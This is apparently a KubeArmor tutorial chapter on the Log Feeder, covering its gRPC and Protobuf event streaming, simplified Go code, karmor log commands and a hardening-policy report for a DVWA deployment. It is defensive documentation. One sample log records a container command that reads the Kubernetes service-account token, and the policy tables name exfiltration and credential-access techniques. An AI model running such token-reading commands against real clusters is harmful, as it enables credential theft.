We've discussed how KubeArmor can audit or block actions based on policies. But where do you actually see the results of this monitoring and enforcement? How do you know when a policy was violated or when suspicious activity was detected?

This is where the Log Feeder comes in.

What is the Log Feeder?

Think of the Log Feeder as KubeArmor's reporting and alerting system. Its primary job is to collect all the security-relevant events and telemetry that KubeArmor detects and make them available to you and other systems.

It receives structured information, including:

  • Security Alerts: Notifications about actions that were audited or blocked because they violated a Security Policy.

  • System Logs: Telemetry about system activities that KubeArmor is monitoring, even if no specific policy applies (e.g., process executions, file accesses, network connections, depending on visibility settings).

  • KubeArmor Messages: Internal messages from the KubeArmor Daemon itself (useful for debugging and monitoring KubeArmor's status).

The Log Feeder formats this information into standardized messages (using Protobuf, a language-neutral, platform-neutral, extensible mechanism for serializing structured data) and sends it out over a gRPC interface. gRPC is a high-performance framework for inter-process communication.

This gRPC interface allows various clients to connect to the KubeArmor Daemon on each node and subscribe to streams of these security events in real-time. Tools like karmor log (part of the KubeArmor client tools) connect to this feeder to display events. External systems like Security Information and Event Management (SIEM) platforms can also integrate by writing clients that understand the KubeArmor gRPC format.

Why is Log Feeding Important? Your Window into Security

You've deployed KubeArmor and applied policies. Now you need to answer questions like:

  • Was that attempt to read /etc/passwd from the web server container actually blocked?

  • Is any process on my host nodes trying to access sensitive files like /root/.ssh?

  • Are my applications spawning unexpected shell processes, even if they aren't explicitly blocked by policy?

  • Did KubeArmor successfully apply the policies I created?

The Log Feeder provides the answers by giving you a stream of events directly from KubeArmor:

  • It reports when an action was Blocked by a specific policy, providing details about the workload and the attempted action.

  • It reports when an action was Audited, showing you potentially suspicious behavior even if it wasn't severe enough to block.

  • It reports general System Events (logs), giving you visibility into the normal or unusual behavior of processes, file accesses, and network connections on your nodes and within containers.

Without the Log Feeder, KubeArmor would be enforcing policies blindly from a monitoring perspective. You wouldn't have the necessary visibility to understand your security posture, detect attacks (even failed ones), or troubleshoot policy issues.

Use Case Example: You want to see every time someone tries to execute a shell (/bin/sh, /bin/bash) inside any of your containers. You might create an Audit Policy for this. The Log Feeder is how you'll receive the notifications for these audited events.

How the Log Feeder Works (High-Level)

  1. Event Source: The System Monitor observes kernel events (process execution, file access, etc.). It enriches these events with Container/Node Identity and sends them to the KubeArmor Daemon. The Runtime Enforcer also contributes by confirming if an event was blocked or audited by policy.

  2. Reception by Daemon: The KubeArmor Daemon receives these enriched events.

  3. Formatting (by Feeder): The Daemon passes the event data to the Log Feeder component. The Feeder takes the structured event data and converts it into the predefined Protobuf message format (e.g., Alert or Log message types defined in protobuf/kubearmor.proto).

  4. Queueing: The Feeder manages internal queues or channels for different types of messages (Alerts, Logs, general KubeArmor Messages). It puts the newly formatted Protobuf message onto the appropriate queue/channel.

  5. gRPC Server: The Feeder runs a gRPC server on a specific port (default 32767).

  6. Client Subscription: External clients connect to this gRPC port and call specific gRPC methods (like WatchAlerts or WatchLogs) to subscribe to event streams.

  7. Event Streaming: When a client subscribes, the Feeder gets a handle to the client's connection. It then continuously reads messages from its internal queues/channels and streams them over the gRPC connection to the connected client.

Here's a simple sequence diagram showing the flow:

This shows how events flow from the kernel, up through the System Monitor and Daemon, are formatted by the Log Feeder, and then streamed out to any connected clients.

Looking at the Code (Simplified)

The Log Feeder is implemented primarily in KubeArmor/feeder/feeder.go and KubeArmor/feeder/logServer.go, using definitions from protobuf/kubearmor.proto and the generated protobuf/kubearmor_grpc.pb.go.

First, let's look at the Protobuf message structures. These define the schema for the data that gets sent out.

Referencing protobuf/kubearmor.proto:

These Protobuf definitions specify the exact structure and data types for the messages KubeArmor will send, ensuring that clients know exactly what data to expect. The .pb.go and _grpc.pb.go files are automatically generated from this .proto file and provide the Go code for serializing/deserializing these messages and implementing the gRPC service.

Now, let's look at the Log Feeder implementation in Go.

Referencing KubeArmor/feeder/feeder.go:

Explanation:

  • NewFeeder: This function, called during Daemon initialization, sets up the data structures (EventStructs) to manage client connections, creates a network listener for the configured gRPC port, and creates and registers the gRPC server (LogServer). It passes a reference to EventStructs and other data to the LogService implementation.

  • ServeLogFeeds: This function is run as a goroutine by the KubeArmor Daemon. It calls LogServer.Serve(), which makes the gRPC server start listening for incoming client connections and handling gRPC requests.

  • PushLog: This method is called by the KubeArmor Daemon (specifically, the part that processes events from the System Monitor) whenever a new security event or log needs to be reported. It takes KubeArmor's internal tp.Log structure, converts it into the appropriate Protobuf message (pb.Alert or pb.Log), and then iterates through all registered client connections (stored in EventStructs) broadcasting the message to their respective Go channels (Broadcast). If a client isn't reading fast enough, the message might be dropped due to the channel buffer being full.

Now let's see the client-side handling logic within the Log Feeder's gRPC service implementation.

Referencing KubeArmor/feeder/logServer.go:

Explanation:

  • LogService: This struct is the concrete implementation of the gRPC service defined in protobuf/kubearmor.proto. It holds references to the feeder's state.

  • WatchAlerts: This method is a gRPC streaming RPC handler. When a client initiates a WatchAlerts call, this function is executed. It creates a dedicated Go channel (conn) for that client using AddAlertStruct. Then, it enters a for loop. Inside the loop, it waits for either the client to disconnect (<-svr.Context().Done()) or for a new pb.Alert message to appear on the client's dedicated channel (<-conn). When a message arrives, it sends it over the gRPC stream back to the client using svr.Send(resp). This creates the real-time streaming behavior.

  • WatchLogs: This method is similar to WatchAlerts but handles subscriptions for general system logs (pb.Log messages).

This shows how the Log Feeder's gRPC server manages multiple concurrent client connections, each with its own channel, ensuring that events pushed by PushLog are delivered to all interested subscribers efficiently.

Connecting to the Log Feeder

The most common way to connect to the Log Feeder is using the karmor command-line tool provided with KubeArmor.

To watch security alerts:

To watch system logs:

To watch both alerts and logs:

These commands are simply gRPC clients that connect to the KubeArmor Daemon's Log Feeder port on your nodes (or via the KubeArmor Relay service if configured) and call the WatchAlerts and WatchLogs gRPC methods.

You can also specify filters (e.g., by namespace or policy name) using karmor log options, which the Log Feeder's gRPC handlers can process (although the code snippets above show a simplified filter handling).

For integration with other systems, you would write a custom gRPC client application in your preferred language (Go, Python, Java, etc.) using the KubeArmor Protobuf definitions to connect to the feeder and consume the streams.

Log Feeder Components Summary

Conclusion

The Log Feeder is your essential window into KubeArmor's activity. By collecting enriched security events and telemetry from the System Monitor and Runtime Enforcer, formatting them using Protobuf, and streaming them over a gRPC interface, it provides real-time visibility into policy violations (alerts) and system behavior (logs). Tools like karmor log and integrations with SIEM systems rely on the Log Feeder to deliver crucial security insights from your KubeArmor-protected environment.

This chapter concludes our detailed look into the core components of KubeArmor! You now have a foundational understanding of how KubeArmor defines policies, identifies workloads, enforces rules, monitors system activity using eBPF, orchestrates these actions with the Daemon, and reports everything via the Log Feeder.

Thank you for following this tutorial series! We hope it has provided a clear and beginner-friendly introduction to the fascinating world of KubeArmor.

ModelArmor Overview

ModelArmor uses KubeArmor as a sandboxing engine to ensure that the untrusted models execution is constrained and within required checks. AI/ML Models are essentially processes and allowing untrusted models to execute in AI environments have significant risks such as possibility of cryptomining attacks leveraging GPUs, remote command injections, etc. KubeArmor's preemptive mitigation mechanism provides a suitable framework for constraining the execution environment of models.

ModelArmor can be used to enforce security policies on the model execution environment.

TensorFlow Based Use Cases

FGSM Attack on a TensorFlow Model

Keras Inject Attack and Apply Policies


Securing NVIDIA NIM

Least Permissive Access

KubeArmor helps organizations enforce a zero trust posture within their Kubernetes clusters. It allows users to define an allow-based policy that allows specific operations, and denies or audits all other operations. This helps to ensure that only authorized activities are allowed within the cluster, and that any deviations from the expected behavior are denied and flagged for further investigation.

By implementing a zero trust posture with KubeArmor, organizations can increase their security posture and reduce the risk of unauthorized access or activity within their Kubernetes clusters. This can help to protect sensitive data, prevent system breaches, and maintain the integrity of the cluster.

Allow execution of only specific processes within the pod

  1. Install the nginx deployment using

    • kubectl create deployment nginx --image=nginx.

  2. Set the default security posture to default-deny.

    • kubectl annotate ns default kubearmor-file-posture=block --overwrite

  3. Apply the following policy:

Observe that the policy contains Allow action. Once there is any KubeArmor policy having Allow action then the pods enter least permissive mode, allowing only explicitly allowed operations.

Note: Use kubectl port-forward $POD --address 0.0.0.0 8080:80 to access nginx and you can see that the nginx web access still works normally.

Lets try to execute some other processes:

This would be permission denied.

Challenges with maintaining Zero Trust Security Posture

Achieving Zero Trust Security Posture is difficult. However, the more difficult part is to maintain the Zero Trust posture across application updates. There is also a risk of application downtime if the security posture is not correctly identified. While KubeArmor provides a way to enforce Zero Trust Security Posture, identifying the policies/rules for achieving this is non-trivial and requires that you keep the policies in dry-run mode (or default audit mode) before using the default-deny mode.

Hardening policies are derived from industry leading compliance standards and attack frameworks such as CIS, MITRE, NIST, STIGs, and several others. contains the latest hardening policies. KubeArmor client tool (karmor) provides a way (karmor recommend) to fetch the policies in the context of the kubernetes workloads or specific container using command line. The output is a set of or that can be applied using k8s native tools (such as kubectl apply).

Component
Description
Located In
KubeArmor Role

📄

KubeArmor supports allow-based policies which results in specific actions to be allowed and denying/auditing everything else. For example, a specific pod/container might only invoke a set of binaries at runtime. As part of allow-based rules you can specify the set of processes that are allowed and everything else is either audited or denied based on the .

KubeArmor provides framework so as to smoothen the journey to Zero Trust posture. For e.g., it is possible to set dry-run/audit mode at the namespace level by . Thus, you can have different namespaces in different default security posture modes (default-deny vs default-audit). Users can switch to default-deny mode once they are comfortable (i.e., they do not see any alerts) with the settings.

❯ karmor recommend -n dvwa
INFO[0000] pulling image                                 image="cytopia/dvwa:php-8.1"
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-cert-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
INFO[0000] pulling image                                 image="mariadb:10.1"
created policy out/dvwa-dvwa-mysql/mariadb-10-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-cert-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
output report in out/report.txt ...
  Deployment              | dvwa/dvwa-web         
  Container               | cytopia/dvwa:php-8.1  
  OS                      | linux                 
  Arch                    |                       
  Distro                  |                       
  Output Directory        | out/dvwa-dvwa-web     
  policy-template version | v0.1.6                
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
|               POLICY                |           SHORT DESC           | SEVERITY | ACTION |                       TAGS                        |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-maintenance-   | Restrict access to maintenance | 1        | Block  | PCI_DSS                                           |
| tool-access.yaml                    | tools (apk, mii-tool, ...)     |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-cert-          | Restrict access to trusted     | 1        | Block  | MITRE                                             |
| access.yaml                         | certificated bundles in the OS |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     | image                          |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-owner-  | System Information Discovery   | 3        | Block  | MITRE                                             |
| discovery.yaml                      | - block system owner discovery |          |        | MITRE_T1082_system_information_discovery          |
|                                     | commands                       |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-        | System and Information         | 5        | Block  | NIST NIST_800-53_AU-2                             |
| monitoring-deny-write-under-bin-    | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
| directory.yaml                      | make directory under /bin/     |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-        | System and Information         | 5        | Audit  | NIST NIST_800-53_AU-2                             |
| monitoring-write-under-dev-         | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
| directory.yaml                      | make files under /dev/         |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-        | System and Information         | 5        | Audit  | NIST SI-4                                         |
| monitoring-detect-access-to-        | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4                                  |
| cronjob-files.yaml                  | Detect access to cronjob files |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-least-         | System and Information         | 5        | Block  | NIST                                              |
| functionality-execute-package-      | Integrity - Least              |          |        | NIST_800-53_CM-7(4)                               |
| management-process-in-              | Functionality deny execution   |          |        | SI-4 process                                      |
| container.yaml                      | of package manager process in  |          |        | NIST_800-53_SI-4                                  |
|                                     | container                      |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-remote-   | The adversary is trying to     | 5        | Block  | MITRE                                             |
| file-copy.yaml                      | steal data.                    |          |        | MITRE_TA0008_lateral_movement                     |
|                                     |                                |          |        | MITRE_TA0010_exfiltration                         |
|                                     |                                |          |        | MITRE_TA0006_credential_access                    |
|                                     |                                |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     |                                |          |        | NIST_800-53_SI-4(18) NIST                         |
|                                     |                                |          |        | NIST_800-53 NIST_800-53_SC-4                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-in- | The adversary is trying to     | 5        | Block  | MITRE_execution                                   |
| shm-folder.yaml                     | write under shm folder         |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-    | The adversary is trying to     | 5        | Block  | NIST_800-53_SI-7 NIST                             |
| under-etc-directory.yaml            | avoid being detected.          |          |        | NIST_800-53_SI-4 NIST_800-53                      |
|                                     |                                |          |        | MITRE_T1562.001_disable_or_modify_tools           |
|                                     |                                |          |        | MITRE_T1036.005_match_legitimate_name_or_location |
|                                     |                                |          |        | MITRE_TA0003_persistence                          |
|                                     |                                |          |        | MITRE MITRE_T1036_masquerading                    |
|                                     |                                |          |        | MITRE_TA0005_defense_evasion                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-    | Adversaries may delete or      | 5        | Block  | NIST NIST_800-53 NIST_800-53_CM-5                 |
| under-etc-directory.yaml            | modify artifacts generated     |          |        | NIST_800-53_AU-6(8)                               |
|                                     | within systems to remove       |          |        | MITRE_T1070_indicator_removal_on_host             |
|                                     | evidence.                      |          |        | MITRE MITRE_T1036_masquerading                    |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+

  Deployment              | dvwa/dvwa-mysql      
  Container               | mariadb:10.1         
  OS                      | linux                
  Arch                    |                      
  Distro                  |                      
  Output Directory        | out/dvwa-dvwa-mysql  
  policy-template version | v0.1.6               
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
|               POLICY                |           SHORT DESC           | SEVERITY | ACTION |                       TAGS                        |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-maintenance-tool-      | Restrict access to maintenance | 1        | Block  | PCI_DSS                                           |
| access.yaml                         | tools (apk, mii-tool, ...)     |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-cert-access.yaml       | Restrict access to trusted     | 1        | Block  | MITRE                                             |
|                                     | certificated bundles in the OS |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     | image                          |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-owner-          | System Information Discovery   | 3        | Block  | MITRE                                             |
| discovery.yaml                      | - block system owner discovery |          |        | MITRE_T1082_system_information_discovery          |
|                                     | commands                       |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring-     | System and Information         | 5        | Block  | NIST NIST_800-53_AU-2                             |
| deny-write-under-bin-directory.yaml | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
|                                     | make directory under /bin/     |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring-     | System and Information         | 5        | Audit  | NIST NIST_800-53_AU-2                             |
| write-under-dev-directory.yaml      | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
|                                     | make files under /dev/         |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring-     | System and Information         | 5        | Audit  | NIST SI-4                                         |
| detect-access-to-cronjob-files.yaml | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4                                  |
|                                     | Detect access to cronjob files |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-least-functionality-   | System and Information         | 5        | Block  | NIST                                              |
| execute-package-management-process- | Integrity - Least              |          |        | NIST_800-53_CM-7(4)                               |
| in-container.yaml                   | Functionality deny execution   |          |        | SI-4 process                                      |
|                                     | of package manager process in  |          |        | NIST_800-53_SI-4                                  |
|                                     | container                      |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-remote-file-      | The adversary is trying to     | 5        | Block  | MITRE                                             |
| copy.yaml                           | steal data.                    |          |        | MITRE_TA0008_lateral_movement                     |
|                                     |                                |          |        | MITRE_TA0010_exfiltration                         |
|                                     |                                |          |        | MITRE_TA0006_credential_access                    |
|                                     |                                |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     |                                |          |        | NIST_800-53_SI-4(18) NIST                         |
|                                     |                                |          |        | NIST_800-53 NIST_800-53_SC-4                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-in-shm-     | The adversary is trying to     | 5        | Block  | MITRE_execution                                   |
| folder.yaml                         | write under shm folder         |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc-  | The adversary is trying to     | 5        | Block  | NIST_800-53_SI-7 NIST                             |
| directory.yaml                      | avoid being detected.          |          |        | NIST_800-53_SI-4 NIST_800-53                      |
|                                     |                                |          |        | MITRE_T1562.001_disable_or_modify_tools           |
|                                     |                                |          |        | MITRE_T1036.005_match_legitimate_name_or_location |
|                                     |                                |          |        | MITRE_TA0003_persistence                          |
|                                     |                                |          |        | MITRE MITRE_T1036_masquerading                    |
|                                     |                                |          |        | MITRE_TA0005_defense_evasion                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc-  | Adversaries may delete or      | 5        | Block  | NIST NIST_800-53 NIST_800-53_CM-5                 |
| directory.yaml                      | modify artifacts generated     |          |        | NIST_800-53_AU-6(8)                               |
|                                     | within systems to remove       |          |        | MITRE_T1070_indicator_removal_on_host             |
|                                     | evidence.                      |          |        | MITRE MITRE_T1036_masquerading                    |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
karmor logs -n default --json --logFilter all --operation process
{
  "Timestamp": 1686491023,
  "UpdatedTime": "2023-06-11T13:43:43.289380Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",              
  "NamespaceName": "default",                  
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",                                                                       
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",           
  "ContainerName": "nginx",            
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "ParentProcessName": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",                 
  "ProcessName": "/bin/sh",
  "HostPPID": 3488352,                         
  "HostPID": 3488357,                          
  "PPID": 3488352,                             
  "PID": 832,                                  
  "Type": "ContainerLog",
  "Source": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",                            
  "Operation": "Process",
  "Resource": "/bin/sh -c cat /run/secrets/kubernetes.io/serviceaccount/token",                
  "Data": "syscall=SYS_EXECVE",
  "Result": "Passed"                           
}                                              
{                                              
  "Timestamp": 1686491023,
  "UpdatedTime": "2023-06-11T13:43:43.291471Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",           
  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "ParentProcessName": "/bin/dash",
  "ProcessName": "/bin/cat",
  "HostPPID": 3488357,                         
  "HostPID": 3488363,                          
  "PPID": 832,                                 
  "PID": 838,                                  
  "Type": "ContainerLog",
  "Source": "/bin/dash",
  "Operation": "Process",
  "Resource": "/bin/cat /run/secrets/kubernetes.io/serviceaccount/token",                      
  "Data": "syscall=SYS_EXECVE",
  "Result": "Passed"                           
}
// Simplified Protobuf definition for an Alert message
message Alert {
  int64 Timestamp = 1;
  string UpdatedTime = 2;
  string ClusterName = 3;
  string HostName = 4;
  string NamespaceName = 5;
  Podowner Owner = 31; // Link to PodOwner struct
  string PodName = 6;
  string Labels = 29;

  string ContainerID = 7;
  string ContainerName = 8;
  string ContainerImage = 24;

  // Process details (host/container PIDs, names, UID)
  int32 HostPPID = 27;
  int32 HostPID = 9;
  int32 PPID = 10;
  int32 PID = 11;
  int32 UID = 12;
  string ParentProcessName = 25;
  string ProcessName = 26;

  // Policy/Enforcement details
  string PolicyName = 13;
  string Severity = 14;
  string Tags = 15; // Comma separated tags from policy
  repeated string ATags = 30; // Tags as a list

  string Message = 16; // High-level description
  string Type = 17; // e.g., MatchedPolicy, MatchedHostPolicy, SystemEvent
  string Source = 18; // e.g., /bin/bash
  string Operation = 19; // e.g., Process, File, Network
  string Resource = 20; // e.g., /etc/passwd, tcp://1.2.3.4:80
  string Data = 21; // Additional data if any
  string Enforcer = 28; // e.g., BPFLSM, AppArmor, eBPF Monitor
  string Action = 22; // e.g., Allow, Audit, Block
  string Result = 23; // e.g., Failed, Passed, Error

  // Context details
  string Cwd = 32; // Current working directory
  string TTY = 33; // TTY information

  // Throttling info (for alerts)
  int32 MaxAlertsPerSec = 34;
  int32 DroppingAlertsInterval = 35;

  ExecEvent ExecEvent = 36; // Link to ExecEvent struct

  // ... other fields
}

// Simplified Protobuf definition for a Log message (similar but fewer policy fields)
message Log {
  int64 Timestamp = 1;
  string UpdatedTime = 2;
  // ... similar identity/process fields as Alert ...
  string Type = 13; // e.g., ContainerLog, HostLog
  string Source = 14;
  string Operation = 15;
  string Resource = 16;
  string Data = 17;
  string Result = 18; // e.g., Success, Failed

  string Cwd = 25;
  string TTY = 26;

  ExecEvent ExecEvent = 27;
}

// Simplified definitions for nested structs
message Podowner {
  string Ref = 1;
  string Name = 2;
  string Namespace = 3;
}

message ExecEvent {
  string ExecID = 1;
  string ExecutableName = 2;
}
// NewFeeder Function (Simplified)
func NewFeeder(node *tp.Node, nodeLock **sync.RWMutex) *Feeder {
	fd := &Feeder{}

	// Initialize data structures to hold connection channels
	fd.EventStructs = &EventStructs{
		MsgStructs: make(map[string]EventStruct[pb.Message]),
		MsgLock:    sync.RWMutex{},
		AlertStructs: make(map[string]EventStruct[pb.Alert]),
		AlertLock:  sync.RWMutex{},
		LogStructs: make(map[string]EventStruct[pb.Log]),
		LogLock:    sync.RWMutex{},
	}

	// Configure and start the gRPC server
	fd.Port = fmt.Sprintf(":%s", cfg.GlobalCfg.GRPC) // Get port from config
	listener, err := net.Listen("tcp", fd.Port)
	if err != nil {
		kg.Errf("Failed to listen a port (%s, %s)", fd.Port, err.Error())
		return nil // Handle error
	}
	fd.Listener = listener

	// Create the gRPC server instance
	logService := &LogService{
		QueueSize:    1000, // Define queue size for client channels
		Running:      &fd.Running,
		EventStructs: fd.EventStructs, // Pass the connection store
	}
	fd.LogServer = grpc.NewServer(/* ... gRPC server options ... */)

	// Register the LogService implementation with the gRPC server
	pb.RegisterLogServiceServer(fd.LogServer, logService)

	// ... other initialization ...

	return fd
}

// ServeLogFeeds Function (Called by the Daemon)
func (fd *BaseFeeder) ServeLogFeeds() {
	fd.WgServer.Add(1)
	defer fd.WgServer.Done()

	// This line blocks forever, serving gRPC requests until Listener.Close() is called
	if err := fd.LogServer.Serve(fd.Listener); err != nil {
		kg.Print("Terminated the gRPC service")
	}
}

// PushLog Function (Called by the Daemon/System Monitor)
func (fd *Feeder) PushLog(log tp.Log) {
    // ... code to process the incoming internal log struct (tp.Log) ...

    // Convert the internal log struct (tp.Log) into the Protobuf Log or Alert struct (pb.Log/pb.Alert)
	// This involves mapping fields like ContainerID, ProcessName, Resource, Action, PolicyName etc.
    // The logic checks the type and fields to decide if it's an Alert or a general Log

	if log.Type == "MatchedPolicy" || log.Type == "MatchedHostPolicy" || log.Type == "SystemEvent" {
        // It's a security alert type of event
		pbAlert := pb.Alert{}
        // Copy fields from internal log struct to pbAlert struct
		pbAlert.Timestamp = log.Timestamp
        // ... copy other fields like ContainerID, PolicyName, Action, Resource ...

        // Broadcast the pbAlert to all connected clients watching alerts
		fd.EventStructs.AlertLock.Lock() // Lock for safe concurrent access
		defer fd.EventStructs.AlertLock.Unlock()
		for uid := range fd.EventStructs.AlertStructs {
			select {
			case fd.EventStructs.AlertStructs[uid].Broadcast <- &pbAlert: // Send to client's channel
			default:
                // If the client's channel is full, the message is dropped
				kg.Printf("alert channel busy, alert dropped.")
			}
		}
	} else {
        // It's a general system log type of event
		pbLog := pb.Log{}
		// Copy fields from internal log struct to pbLog struct
		pbLog.Timestamp = log.Timestamp
		// ... copy other fields like ContainerID, ProcessName, Resource ...

        // Broadcast the pbLog to all connected clients watching logs
		fd.EventStructs.LogLock.Lock() // Lock for safe concurrent access
		defer fd.EventStructs.LogLock.Unlock()
		for uid := range fd.EventStructs.LogStructs {
			select {
			case fd.EventStructs.LogStructs[uid].Broadcast <- &pbLog: // Send to client's channel
			default:
                // If the client's channel is full, the message is dropped
				kg.Printf("log channel busy, log dropped.")
			}
		}
	}
}
// LogService Struct (Simplified)
type LogService struct {
	QueueSize    int // Max size of the channel buffer for each client
	EventStructs *EventStructs // Pointer to the feeder's connection store
	Running      *bool // Pointer to the feeder's running status
}

// WatchAlerts Function (Simplified - gRPC handler)
// This function is called by the gRPC server whenever a client calls the WatchAlerts RPC
func (ls *LogService) WatchAlerts(req *pb.RequestMessage, svr pb.LogService_WatchAlertsServer) error {
	// req contains client's request (e.g., filter options)
	// svr is the gRPC server stream to send messages back to the client

	// Add this client connection to the feeder's connection store
	// This creates a new Go channel for this specific client
	uid, conn := ls.EventStructs.AddAlertStruct(req.Filter, ls.QueueSize)
	kg.Printf("Added a new client (%s, %s) for WatchAlerts", uid, req.Filter)

	defer func() {
		// This code runs when the client disconnects or an error occurs
		close(conn) // Close the channel
		ls.EventStructs.RemoveAlertStruct(uid) // Remove from the store
		kg.Printf("Deleted the client (%s) for WatchAlerts", uid)
	}()

    // Loop continuously while KubeArmor is running and the client is connected
	for *ls.Running {
		select {
		case <-svr.Context().Done():
            // Client disconnected, exit the loop
			return nil
		case resp := <-conn:
            // A new pb.Alert message arrived on the client's channel (pushed by PushLog)
			if err := kl.HandleGRPCErrors(svr.Send(resp)); err != nil {
                // Failed to send to the client (e.g., network issue)
				kg.Warnf("Failed to send an alert=[%+v] err=[%s]", resp, err.Error())
				return err // Exit the loop with an error
			}
		}
	}

	return nil // KubeArmor is shutting down, exit gracefully
}

// WatchLogs Function (Simplified - gRPC handler, similar to WatchAlerts)
// This function is called by the gRPC server whenever a client calls the WatchLogs RPC
func (ls *LogService) WatchLogs(req *pb.RequestMessage, svr pb.LogService_WatchLogsServer) error {
    // ... Similar logic to WatchAlerts, but uses AddLogStruct, RemoveLogStruct,
    // and reads from the LogStructs' Broadcast channel to send pb.Log messages ...
    return nil // Simplified
}
karmor log --alert
karmor log --log
karmor log --alert --log

gRPC Server

